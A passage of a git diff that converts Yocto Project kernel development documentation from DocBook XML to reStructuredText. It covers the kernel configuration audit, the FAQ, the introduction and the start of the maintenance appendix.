-            variable and gathered in a temporary work area where they are
-            subsequently used to create the unique kernel.
-            Thus, in a sense, the process constructs a local source tree
-            specific to your kernel from which to generate the new kernel
-            image.
-        </para>
-
-        <para>
-            The following figure shows the temporary file structure
-            created on your host system when you build the kernel using
-            Bitbake.
-            This
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-            contains all the source files used during the build.
-            <imagedata fileref="figures/kernel-overview-2-generic.png"
-                width="6in" depth="5in" align="center" scale="100" />
-        </para>
-
-        <para>
-            Again, for additional information on the Yocto Project kernel's
-            architecture and its branching strategy, see the
-            "<link linkend='yocto-linux-kernel-architecture-and-branching-strategies'>Yocto Linux Kernel Architecture and Branching Strategies</link>"
-            section.
-            You can also reference the
-            "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
-            and
-            "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
-            sections for detailed example that modifies the kernel.
-        </para>
-    </section>
-
-    <section id='determining-hardware-and-non-hardware-features-for-the-kernel-configuration-audit-phase'>
-        <title>Determining Hardware and Non-Hardware Features for the Kernel Configuration Audit Phase</title>
-
-        <para>
-            This section describes part of the kernel configuration audit
-            phase that most developers can ignore.
-            For general information on kernel configuration including
-            <filename>menuconfig</filename>, <filename>defconfig</filename>
-            files, and configuration fragments, see the
-            "<link linkend='configuring-the-kernel'>Configuring the Kernel</link>"
-            section.
-        </para>
-
-        <para>
-            During this part of the audit phase, the contents of the final
-            <filename>.config</filename> file are compared against the
-            fragments specified by the system.
-            These fragments can be system fragments, distro fragments,
-            or user-specified configuration elements.
-            Regardless of their origin, the OpenEmbedded build system
-            warns the user if a specific option is not included in the
-            final kernel configuration.
-        </para>
-
-        <para>
-            By default, in order to not overwhelm the user with
-            configuration warnings, the system only reports missing
-            "hardware" options as they could result in a boot
-            failure or indicate that important hardware is not available.
-        </para>
-
-        <para>
-            To determine whether or not a given option is "hardware" or
-            "non-hardware", the kernel Metadata in
-            <filename>yocto-kernel-cache</filename> contains files that
-            classify individual or groups of options as either hardware
-            or non-hardware.
-            To better show this, consider a situation where the
-            <filename>yocto-kernel-cache</filename> contains the following
-            files:
-            <literallayout class='monospaced'>
-     yocto-kernel-cache/features/drm-psb/hardware.cfg
-     yocto-kernel-cache/features/kgdb/hardware.cfg
-     yocto-kernel-cache/ktypes/base/hardware.cfg
-     yocto-kernel-cache/bsp/mti-malta32/hardware.cfg
-     yocto-kernel-cache/bsp/qemu-ppc32/hardware.cfg
-     yocto-kernel-cache/bsp/qemuarma9/hardware.cfg
-     yocto-kernel-cache/bsp/mti-malta64/hardware.cfg
-     yocto-kernel-cache/bsp/arm-versatile-926ejs/hardware.cfg
-     yocto-kernel-cache/bsp/common-pc/hardware.cfg
-     yocto-kernel-cache/bsp/common-pc-64/hardware.cfg
-     yocto-kernel-cache/features/rfkill/non-hardware.cfg
-     yocto-kernel-cache/ktypes/base/non-hardware.cfg
-     yocto-kernel-cache/features/aufs/non-hardware.kcf
-     yocto-kernel-cache/features/ocf/non-hardware.kcf
-     yocto-kernel-cache/ktypes/base/non-hardware.kcf
-     yocto-kernel-cache/ktypes/base/hardware.kcf
-     yocto-kernel-cache/bsp/qemu-ppc32/hardware.kcf
-            </literallayout>
-            The following list provides explanations for the various
-            files:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>hardware.kcf</filename>:
-                    Specifies a list of kernel Kconfig files that contain
-                    hardware options only.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>non-hardware.kcf</filename>:
-                    Specifies a list of kernel Kconfig files that contain
-                    non-hardware options only.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>hardware.cfg</filename>:
-                    Specifies a list of kernel <filename>CONFIG_</filename>
-                    options that are hardware, regardless of whether or not
-                    they are within a Kconfig file specified by a hardware
-                    or non-hardware Kconfig file (i.e.
-                    <filename>hardware.kcf</filename> or
-                    <filename>non-hardware.kcf</filename>).
-                    </para></listitem>
-                <listitem><para>
-                    <filename>non-hardware.cfg</filename>:
-                    Specifies a list of kernel <filename>CONFIG_</filename>
-                    options that are not hardware, regardless of whether or
-                    not they are within a Kconfig file specified by a
-                    hardware or non-hardware Kconfig file (i.e.
-                    <filename>hardware.kcf</filename> or
-                    <filename>non-hardware.kcf</filename>).
-                    </para></listitem>
-            </itemizedlist>
-            Here is a specific example using the
-            <filename>kernel-cache/bsp/mti-malta32/hardware.cfg</filename>:
-            <literallayout class='monospaced'>
-     CONFIG_SERIAL_8250
-     CONFIG_SERIAL_8250_CONSOLE
-     CONFIG_SERIAL_8250_NR_UARTS
-     CONFIG_SERIAL_8250_PCI
-     CONFIG_SERIAL_CORE
-     CONFIG_SERIAL_CORE_CONSOLE
-     CONFIG_VGA_ARB
-            </literallayout>
-            The kernel configuration audit automatically detects these
-            files (hence the names must be exactly the ones discussed here),
-            and uses them as inputs when generating warnings about the
-            final <filename>.config</filename> file.
-        </para>
-
-        <para>
-            A user-specified kernel Metadata repository, or recipe space
-            feature, can use these same files to classify options that are
-            found within its <filename>.cfg</filename> files as hardware
-            or non-hardware, to prevent the OpenEmbedded build system from
-            producing an error or warning when an option is not in the
-            final <filename>.config</filename> file.
-        </para>
-    </section>
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-customization.xsl b/documentation/kernel-dev/kernel-dev-customization.xsl
deleted file mode 100644
index 325b738e94..0000000000
--- a/documentation/kernel-dev/kernel-dev-customization.xsl
+++ /dev/null
@@ -1,26 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'kernel-dev-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel">A</xsl:param>
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/kernel-dev/kernel-dev-faq.rst b/documentation/kernel-dev/kernel-dev-faq.rst
new file mode 100644
index 0000000000..d6be98a0ac
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-faq.rst
@@ -0,0 +1,80 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************
+Kernel Development FAQ
+**********************
+
+.. _kernel-dev-faq-section:
+
+Common Questions and Solutions
+==============================
+
+The following lists some solutions for common questions.
+
+How do I use my own Linux kernel ``.config`` file?
+--------------------------------------------------
+
+Refer to the
+":ref:`kernel-dev/kernel-dev-common:changing the configuration`"
+section for information.
+
+How do I create configuration fragments?
+----------------------------------------
+
+A: Refer to the
+":ref:`kernel-dev/kernel-dev-common:creating configuration fragments`"
+section for information.
+
+How do I use my own Linux kernel sources?
+-----------------------------------------
+
+Refer to the
+":ref:`kernel-dev/kernel-dev-common:working with your own sources`"
+section for information.
+
+How do I install/not-install the kernel image on the rootfs?
+------------------------------------------------------------
+
+The kernel image (e.g. ``vmlinuz``) is provided by the
+``kernel-image`` package. Image recipes depend on ``kernel-base``. To
+specify whether or not the kernel image is installed in the generated
+root filesystem, override ``RDEPENDS_${KERNEL_PACKAGE_NAME}-base`` to include or not
+include "kernel-image". See the
+":ref:`dev-manual/dev-manual-common-tasks:using .bbappend files in your layer`"
+section in the
+Yocto Project Development Tasks Manual for information on how to use an
+append file to override metadata.
+
+How do I install a specific kernel module?
+------------------------------------------
+
+Linux kernel modules are packaged individually. To ensure a
+specific kernel module is included in an image, include it in the
+appropriate machine :term:`RRECOMMENDS` variable.
+These other variables are useful for installing specific modules:
+- :term:`MACHINE_ESSENTIAL_EXTRA_RDEPENDS`
+- :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+- :term:`MACHINE_EXTRA_RDEPENDS`
+- :term:`MACHINE_EXTRA_RRECOMMENDS`
+
+For example, set the following in the ``qemux86.conf`` file to include
+the ``ab123`` kernel modules with images built for the ``qemux86``
+machine:
+::
+
+   MACHINE_EXTRA_RRECOMMENDS += "kernel-module-ab123"
+
+For more information, see the
+":ref:`kernel-dev/kernel-dev-common:incorporating out-of-tree modules`" section.
+
+How do I change the Linux kernel command line?
+----------------------------------------------
+
+The Linux kernel command line is
+typically specified in the machine config using the ``APPEND`` variable.
+For example, you can add some helpful debug information doing the
+following:
+::
+
+   APPEND += "printk.time=y initcall_debug debug"
+
diff --git a/documentation/kernel-dev/kernel-dev-faq.xml b/documentation/kernel-dev/kernel-dev-faq.xml
deleted file mode 100644
index c3a20465a0..0000000000
--- a/documentation/kernel-dev/kernel-dev-faq.xml
+++ /dev/null
@@ -1,142 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='kernel-dev-faq'>
-<title>Kernel Development FAQ</title>
-
-<section id='kernel-dev-faq-section'>
-    <title>Common Questions and Solutions</title>
-
-    <para>
-        The following lists some solutions for common questions.
-
-
-        <qandaset>
-            <qandaentry>
-                <question>
-                    <para>
-                        How do I use my own Linux kernel <filename>.config</filename>
-                        file?
-                    </para>
-                </question>
-                <answer>
-            <para>
-                        Refer to the "<link linkend='changing-the-configuration'>Changing the Configuration</link>"
-                        section for information.
-                    </para>
-                </answer>
-            </qandaentry>
-
-            <qandaentry>
-                <question>
-                    <para>
-                        How do I create configuration fragments?
-                    </para>
-                </question>
-                <answer>
-                    <para>
-                        Refer to the
-                        "<link linkend='creating-config-fragments'>Creating Configuration Fragments</link>"
-                        section for information.
-                    </para>
-                </answer>
-            </qandaentry>
-
-            <qandaentry>
-                <question>
-                    <para>
-                        How do I use my own Linux kernel sources?
-                    </para>
-                </question>
-                <answer>
-                    <para>
-                        Refer to the "<link linkend='working-with-your-own-sources'>Working With Your Own Sources</link>"
-                        section for information.
-                    </para>
-                </answer>
-            </qandaentry>
-
-            <qandaentry>
-                <question>
-                    <para>
-                        How do I install/not-install the kernel image on the rootfs?
-                    </para>
-                </question>
-                <answer>
-                    <para>
-                        The kernel image (e.g. <filename>vmlinuz</filename>) is provided
-                        by the <filename>kernel-image</filename> package.
-                        Image recipes depend on <filename>kernel-base</filename>.
-                        To specify whether or not the kernel
-                        image is installed in the generated root filesystem, override
-                        <filename>RDEPENDS_kernel-base</filename> to include or not
-                        include "kernel-image".</para>
-                        <para>See the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer</ulink>"
-                        section in the Yocto Project Development Tasks Manual
-                        for information on how to use an append file to
-                        override metadata.
-                    </para>
-                </answer>
-            </qandaentry>
-
-            <qandaentry>
-                <question>
-                    <para>
-                        How do I install a specific kernel module?
-                    </para>
-                </question>
-                <answer>
-                    <para>
-                        Linux kernel modules are packaged individually.
-                        To ensure a specific kernel module is included in an image,
-                        include it in the appropriate machine
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>
-                        variable.</para>
-                        <para>These other variables are useful for installing specific
-                        modules:
-                        <literallayout class='monospaced'>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RDEPENDS</filename></ulink>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</filename></ulink>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RDEPENDS'><filename>MACHINE_EXTRA_RDEPENDS</filename></ulink>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RRECOMMENDS'><filename>MACHINE_EXTRA_RRECOMMENDS</filename></ulink>
-                        </literallayout>
-                        For example, set the following in the <filename>qemux86.conf</filename>
-                        file to include the <filename>ab123</filename> kernel modules
-                        with images built for the <filename>qemux86</filename> machine:
-                        <literallayout class='monospaced'>
-     MACHINE_EXTRA_RRECOMMENDS += "kernel-module-ab123"
-                        </literallayout>
-                        For more information, see the
-                        "<link linkend='incorporating-out-of-tree-modules'>Incorporating Out-of-Tree Modules</link>"
-                        section.
-                    </para>
-                </answer>
-            </qandaentry>
-
-            <qandaentry>
-                <question>
-                    <para>
-                        How do I change the Linux kernel command line?
-                   </para>
-                </question>
-                <answer>
-                    <para>
-                        The Linux kernel command line is typically specified in
-                        the machine config using the <filename>APPEND</filename> variable.
-                For example, you can add some helpful debug information doing
-                        the following:
-                        <literallayout class='monospaced'>
-     APPEND += "printk.time=y initcall_debug debug"
-                        </literallayout>
-                    </para>
-                </answer>
-            </qandaentry>
-        </qandaset>
-    </para>
-</section>
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-intro.rst b/documentation/kernel-dev/kernel-dev-intro.rst
new file mode 100644
index 0000000000..5679a0ab80
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-intro.rst
@@ -0,0 +1,182 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Introduction
+************
+
+.. _kernel-dev-overview:
+
+Overview
+========
+
+Regardless of how you intend to make use of the Yocto Project, chances
+are you will work with the Linux kernel. This manual describes how to
+set up your build host to support kernel development, introduces the
+kernel development process, provides background information on the Yocto
+Linux kernel :term:`Metadata`, describes
+common tasks you can perform using the kernel tools, shows you how to
+use the kernel Metadata needed to work with the kernel inside the Yocto
+Project, and provides insight into how the Yocto Project team develops
+and maintains Yocto Linux kernel Git repositories and Metadata.
+
+Each Yocto Project release has a set of Yocto Linux kernel recipes,
+whose Git repositories you can view in the Yocto
+:yocto_git:`Source Repositories <>` under the "Yocto Linux Kernel"
+heading. New recipes for the release track the latest Linux kernel
+upstream developments from https://www.kernel.org and introduce
+newly-supported platforms. Previous recipes in the release are refreshed
+and supported for at least one additional Yocto Project release. As they
+align, these previous releases are updated to include the latest from
+the Long Term Support Initiative (LTSI) project. You can learn more
+about Yocto Linux kernels and LTSI in the ":ref:`Yocto Project Kernel
+Development and Maintenance <kernel-big-picture>`" section.
+
+Also included is a Yocto Linux kernel development recipe
+(``linux-yocto-dev.bb``) should you want to work with the very latest in
+upstream Yocto Linux kernel development and kernel Metadata development.
+
+.. note::
+
+   For more on Yocto Linux kernels, see the
+   ":ref:`Yocto Project Kernel Development and Maintenance <kernel-big-picture>`"
+   section.
+
+The Yocto Project also provides a powerful set of kernel tools for
+managing Yocto Linux kernel sources and configuration data. You can use
+these tools to make a single configuration change, apply multiple
+patches, or work with your own kernel sources.
+
+In particular, the kernel tools allow you to generate configuration
+fragments that specify only what you must, and nothing more.
+Configuration fragments only need to contain the highest level visible
+``CONFIG`` options as presented by the Yocto Linux kernel ``menuconfig``
+system. Contrast this against a complete Yocto Linux kernel ``.config``
+file, which includes all the automatically selected ``CONFIG`` options.
+This efficiency reduces your maintenance effort and allows you to
+further separate your configuration in ways that make sense for your
+project. A common split separates policy and hardware. For example, all
+your kernels might support the ``proc`` and ``sys`` filesystems, but
+only specific boards require sound, USB, or specific drivers. Specifying
+these configurations individually allows you to aggregate them together
+as needed, but maintains them in only one place. Similar logic applies
+to separating source changes.
+
+If you do not maintain your own kernel sources and need to make only
+minimal changes to the sources, the released recipes provide a vetted
+base upon which to layer your changes. Doing so allows you to benefit
+from the continual kernel integration and testing performed during
+development of the Yocto Project.
+
+If, instead, you have a very specific Linux kernel source tree and are
+unable to align with one of the official Yocto Linux kernel recipes, an
+alternative exists by which you can use the Yocto Project Linux kernel
+tools with your own kernel sources.
+
+The remainder of this manual provides instructions for completing
+specific Linux kernel development tasks. These instructions assume you
+are comfortable working with
+`BitBake <https://openembedded.org/wiki/Bitbake>`__ recipes and basic
+open-source development tools. Understanding these concepts will
+facilitate the process of working with the kernel recipes. If you find
+you need some additional background, please be sure to review and
+understand the following documentation:
+
+-  :doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document.
+
+-  :doc:`../overview-manual/overview-manual`.
+
+-  :ref:`devtool
+   workflow <sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow>`
+   as described in the Yocto Project Application Development and the
+   Extensible Software Development Kit (eSDK) manual.
+
+-  The ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  The "`Kernel Modification
+   Workflow <#kernel-modification-workflow>`__" section.
+
+Kernel Modification Workflow
+============================
+
+Kernel modification involves changing the Yocto Project kernel, which
+could involve changing configuration options as well as adding new
+kernel recipes. Configuration changes can be added in the form of
+configuration fragments, while recipe modification comes through the
+kernel's ``recipes-kernel`` area in a kernel layer you create.
+
+This section presents a high-level overview of the Yocto Project kernel
+modification workflow. The illustration and accompanying list provide
+general information and references for further information.
+
+.. image:: figures/kernel-dev-flow.png
+   :align: center
+
+1. *Set up Your Host Development System to Support Development Using the
+   Yocto Project*: See the ":doc:`../dev-manual/dev-manual-start`" section in
+   the Yocto Project Development Tasks Manual for options on how to get
+   a build host ready to use the Yocto Project.
+
+2. *Set Up Your Host Development System for Kernel Development:* It is
+   recommended that you use ``devtool`` and an extensible SDK for kernel
+   development. Alternatively, you can use traditional kernel
+   development methods with the Yocto Project. Either way, there are
+   steps you need to take to get the development environment ready.
+
+   Using ``devtool`` and the eSDK requires that you have a clean build
+   of the image and that you are set up with the appropriate eSDK. For
+   more information, see the
+   ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``"
+   section.
+
+   Using traditional kernel development requires that you have the
+   kernel source available in an isolated local Git repository. For more
+   information, see the
+   ":ref:`kernel-dev/kernel-dev-common:getting ready for traditional kernel development`"
+   section.
+
+3. *Make Changes to the Kernel Source Code if applicable:* Modifying the
+   kernel does not always mean directly changing source files. However,
+   if you have to do this, you make the changes to the files in the
+   eSDK's Build Directory if you are using ``devtool``. For more
+   information, see the
+   ":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+   section.
+
+   If you are using traditional kernel development, you edit the source
+   files in the kernel's local Git repository. For more information, see the
+   ":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+   section.
+
+4. *Make Kernel Configuration Changes if Applicable:* If your situation
+   calls for changing the kernel's configuration, you can use
+   :ref:`menuconfig <kernel-dev/kernel-dev-common:using \`\`menuconfig\`\`>`,
+   which allows you to
+   interactively develop and test the configuration changes you are
+   making to the kernel. Saving changes you make with ``menuconfig``
+   updates the kernel's ``.config`` file.
+
+   .. note::
+
+      Try to resist the temptation to directly edit an existing ``.config``
+      file, which is found in the Build Directory among the source code
+      used for the build. Doing so, can produce unexpected results when
+      the OpenEmbedded build system regenerates the configuration file.
+
+   Once you are satisfied with the configuration changes made using
+   ``menuconfig`` and you have saved them, you can directly compare the
+   resulting ``.config`` file against an existing original and gather
+   those changes into a
+   :ref:`configuration fragment file <creating-config-fragments>` to be
+   referenced from within the kernel's ``.bbappend`` file.
+
+   Additionally, if you are working in a BSP layer and need to modify
+   the BSP's kernel's configuration, you can use ``menuconfig``.
+
+5. *Rebuild the Kernel Image With Your Changes:* Rebuilding the kernel
+   image applies your changes. Depending on your target hardware, you
+   can verify your changes on actual hardware or perhaps QEMU.
+
+The remainder of this developer's guide covers common tasks typically
+used during kernel development, advanced Metadata usage, and Yocto Linux
+kernel maintenance concepts.
diff --git a/documentation/kernel-dev/kernel-dev-intro.xml b/documentation/kernel-dev/kernel-dev-intro.xml
deleted file mode 100644
index 4e4fd282a5..0000000000
--- a/documentation/kernel-dev/kernel-dev-intro.xml
+++ /dev/null
@@ -1,259 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='kernel-dev-intro'>
-<title>Introduction</title>
-
-<section id='kernel-dev-overview'>
-    <title>Overview</title>
-
-    <para>
-        Regardless of how you intend to make use of the Yocto Project,
-        chances are you will work with the Linux kernel.
-        This manual describes how to set up your build host to support
-        kernel development, introduces the kernel development process,
-        provides background information on the Yocto Linux kernel
-        <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>,
-        describes common tasks you can perform using the kernel tools,
-        shows you how to use the kernel Metadata needed to work with
-        the kernel inside the Yocto Project, and provides insight into how
-        the Yocto Project team develops and maintains Yocto Linux kernel
-        Git repositories and Metadata.
-   </para>
-
-   <para>
-        Each Yocto Project release has a set of Yocto Linux kernel recipes,
-        whose Git repositories you can view in the Yocto
-        <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink> under
-        the "Yocto Linux Kernel" heading.
-        New recipes for the release track the latest Linux kernel
-        upstream developments from
-        <ulink url='http://www.kernel.org'></ulink> and introduce
-        newly-supported platforms.
-        Previous recipes in the release are refreshed and supported for at
-        least one additional Yocto Project release.
-        As they align, these previous releases are updated to include the
-        latest from the Long Term Support Initiative (LTSI) project.
-        You can learn more about Yocto Linux kernels and LTSI in the
-        "<link linkend='kernel-big-picture'>Yocto Project Kernel Development and Maintenance</link>"
-        section.
-    </para>
-
-    <para>
-        Also included is a Yocto Linux kernel development recipe
-        (<filename>linux-yocto-dev.bb</filename>) should you want to work
-        with the very latest in upstream Yocto Linux kernel development and
-        kernel Metadata development.
-        <note>
-            For more on Yocto Linux kernels, see the
-            "<link linkend='kernel-big-picture'>Yocto Project Kernel Development and Maintenance</link>
-            section.
-        </note>
-    </para>
-
-    <para>
-        The Yocto Project also provides a powerful set of kernel
-        tools for managing Yocto Linux kernel sources and configuration data.
-        You can use these tools to make a single configuration change,
-        apply multiple patches, or work with your own kernel sources.
-    </para>
-
-    <para>
-        In particular, the kernel tools allow you to generate configuration
-        fragments that specify only what you must, and nothing more.
-        Configuration fragments only need to contain the highest level
-        visible <filename>CONFIG</filename> options as presented by the
-        Yocto Linux kernel <filename>menuconfig</filename> system.
-        Contrast this against a complete Yocto Linux kernel
-        <filename>.config</filename> file, which includes all the automatically
-        selected <filename>CONFIG</filename> options.
-        This efficiency reduces your maintenance effort and allows you
-        to further separate your configuration in ways that make sense for
-        your project.
-        A common split separates policy and hardware.
-        For example, all your kernels might support the
-        <filename>proc</filename> and <filename>sys</filename> filesystems,
-        but only specific boards require sound, USB, or specific drivers.
-        Specifying these configurations individually allows you to aggregate
-        them together as needed, but maintains them in only one place.
-        Similar logic applies to separating source changes.
-    </para>
-
-    <para>
-        If you do not maintain your own kernel sources and need to make
-        only minimal changes to the sources, the released recipes provide a
-        vetted base upon which to layer your changes.
-        Doing so allows you to benefit from the continual kernel
-        integration and testing performed during development of the
-        Yocto Project.
-    </para>
-
-    <para>
-        If, instead, you have a very specific Linux kernel source tree
-        and are unable to align with one of the official Yocto Linux kernel
-        recipes, an alternative exists by which you can use the Yocto
-        Project Linux kernel tools with your own kernel sources.
-    </para>
-
-    <para>
-        The remainder of this manual provides instructions for completing
-        specific Linux kernel development tasks.
-        These instructions assume you are comfortable working with
-        <ulink url='http://openembedded.org/wiki/Bitbake'>BitBake</ulink>
-        recipes and basic open-source development tools.
-        Understanding these concepts will facilitate the process of working
-        with the kernel recipes.
-        If you find you need some additional background, please be sure to
-        review and understand the following documentation:
-        <itemizedlist>
-            <listitem><para>
-                <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
-                document.
-                </para></listitem>
-            <listitem><para>
-                <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>.
-                </para></listitem>
-            <listitem><para>
-                <ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'><filename>devtool</filename> workflow</ulink>
-                as described in the Yocto Project Application Development and
-                the Extensible Software Development Kit (eSDK) manual.
-                </para></listitem>
-            <listitem><para>
-                The
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-            <listitem><para>
-                The
-                "<link linkend='kernel-modification-workflow'>Kernel Modification Workflow</link>"
-                section.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='kernel-modification-workflow'>
-    <title>Kernel Modification Workflow</title>
-
-    <para>
-        Kernel modification involves changing the Yocto Project kernel,
-        which could involve changing configuration options as well as adding
-        new kernel recipes.
-        Configuration changes can be added in the form of configuration
-        fragments, while recipe modification comes through the kernel's
-        <filename>recipes-kernel</filename> area in a kernel layer you create.
-    </para>
-
-    <para>
-        This section presents a high-level overview of the Yocto Project
-        kernel modification workflow.
-        The illustration and accompanying list provide general information
-        and references for further information.
-        <imagedata fileref="figures/kernel-dev-flow.png"
-            width="9in" depth="5in" align="center" scalefit="1" />
-    </para>
-
-    <para>
-        <orderedlist>
-            <listitem><para>
-
-
-                <emphasis>Set up Your Host Development System to Support
-                Development Using the Yocto Project</emphasis>:
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-manual-start'>Setting Up the Development Host to Use the Yocto Project</ulink>"
-                section in the Yocto Project Development Tasks Manual for
-                options on how to get a build host ready to use the Yocto
-                Project.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Set Up Your Host Development System for Kernel Development:</emphasis>
-                It is recommended that you use <filename>devtool</filename>
-                and an extensible SDK for kernel development.
-                Alternatively, you can use traditional kernel development
-                methods with the Yocto Project.
-                Either way, there are steps you need to take to get the
-                development environment ready.</para>
-
-                <para>Using <filename>devtool</filename> and the eSDK requires
-                that you have a clean build of the image and that you are
-                set up with the appropriate eSDK.
-                For more information, see the
-                "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using <filename>devtool</filename></link>"
-                section.</para>
-
-                <para>Using traditional kernel development requires that you
-                have the kernel source available in an isolated local Git
-                repository.
-                For more information, see the
-                "<link linkend='getting-ready-for-traditional-kernel-development'>Getting Ready for Traditional Kernel Development</link>"
-                section.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Make Changes to the Kernel Source Code if
-                applicable:</emphasis>
-                Modifying the kernel does not always mean directly
-                changing source files.
-                However, if you have to do this, you make the changes to the
-                files in the eSDK's Build Directory if you are using
-                <filename>devtool</filename>.
-                For more information, see the
-                "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
-                section.</para>
-
-                <para>If you are using traditional kernel development, you
-                edit the source files in the kernel's local Git repository.
-                For more information, see the
-                "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
-                section.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Make Kernel Configuration Changes if
-                Applicable:</emphasis>
-                If your situation calls for changing the kernel's
-                configuration, you can use
-                <link linkend='using-menuconfig'><filename>menuconfig</filename></link>,
-                which allows you to interactively develop and test the
-                configuration changes you are making to the kernel.
-                Saving changes you make with <filename>menuconfig</filename>
-                updates the kernel's <filename>.config</filename> file.
-                <note><title>Warning</title>
-                    Try to resist the temptation to directly edit an
-                    existing <filename>.config</filename> file, which is
-                    found in the Build Directory among the source code
-                    used for the build.
-                    Doing so, can produce unexpected results when the
-                    OpenEmbedded build system regenerates the configuration
-                    file.
-                </note>
-                Once you are satisfied with the configuration
-                changes made using <filename>menuconfig</filename>
-                and you have saved them, you can directly compare the
-                resulting <filename>.config</filename> file against an
-                existing original and gather those changes into a
-                <link linkend='creating-config-fragments'>configuration fragment file</link>
-                to be referenced from within the kernel's
-                <filename>.bbappend</filename> file.</para>
-
-                <para>Additionally, if you are working in a BSP layer
-                and need to modify the BSP's kernel's configuration,
-                you can use <filename>menuconfig</filename>.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Rebuild the Kernel Image With Your Changes:</emphasis>
-                Rebuilding the kernel image applies your changes.
-                Depending on your target hardware, you can verify your changes
-                on actual hardware or perhaps QEMU.
-                </para></listitem>
-        </orderedlist>
-        The remainder of this developer's guide covers common tasks typically
-        used during kernel development, advanced Metadata usage, and Yocto Linux
-        kernel maintenance concepts.
-    </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-maint-appx.rst b/documentation/kernel-dev/kernel-dev-maint-appx.rst
new file mode 100644
index 0000000000..69f680688f
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-maint-appx.rst
@@ -0,0 +1,239 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************
+Kernel Maintenance
+******************
+
+Tree Construction
+=================
+
+This section describes construction of the Yocto Project kernel source
+repositories as accomplished by the Yocto Project team to create Yocto
+Linux kernel repositories. These kernel repositories are found under the
